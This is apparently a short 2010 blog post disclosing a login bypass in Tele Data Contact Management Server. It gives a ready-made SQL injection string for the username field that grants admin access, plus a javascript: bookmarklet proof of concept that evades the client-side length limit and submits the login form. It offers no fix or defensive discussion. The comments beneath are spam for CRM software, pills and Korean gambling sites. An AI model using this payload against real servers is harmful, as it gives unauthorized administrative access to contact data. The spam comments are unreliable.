Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.
Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--
PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
Wednesday, April 28, 2010
Subscribe to:
Post Comments (Atom)
CRM .The Easy CRM Software for Outlook. Prophet simplifies contact management software, contact manager, small business Sales CRM Software. Prophet is the easiest CRM software because it is built INTO Outlook vs simply synching with Outlook.
ReplyDeletenot bad ^^
ReplyDelete_________________
Nachhilfe Mathematik Berlinnatural male enhancement pills
Betting professionals who want to use Sports Toto are encouraged to have a regular game review process. If you learn to know how Toto works by referring to the reviews of good regulators, you will be able to get a good position on betting sports as a permanent player. 토토사이트 사이트 방문 안전놀이터
ReplyDelete